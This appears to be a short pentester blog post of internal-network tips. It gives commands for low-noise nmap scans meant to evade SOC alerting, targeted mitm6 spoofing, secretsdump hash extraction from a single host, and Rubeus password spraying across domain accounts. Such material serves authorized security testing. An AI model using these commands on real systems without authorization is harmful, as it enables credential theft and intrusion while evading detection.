Mar 30, 2022
Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:
I'm seeing nmap scans get flagged a bit more from managed SOC
services. Maybe a "quieter" nmap scan will help get enough ports to
do a WitnessMe run,
but still fly under the logging/alerting radar? Something
like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA
outputfile
Using mitm6 in "sniper" mode
by targeting just one host
with: mitm6 victim-I-want-to-get-juicy-info-from -d
victim.domain --ignore-nofqnd
Using secretsdump to
target a single host: secretsdump.py -target-ip 1.2.3.4
localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO
.
Note the colon after localadmin
- it's
intentional, NOT an error!
Rubeus makes
password spraying easy-peasy! Rubeus.exe spray
/password:Winter2022 /outfile:output.txt
. Get some hits from
that effort? Then spray the good password against ALL domain
accounts and you might get even more gold!
LDAPs relaying not working? Make sure it's config'd
right: nmap -p636 -sV -iL
txt-file-with-dcs-in-it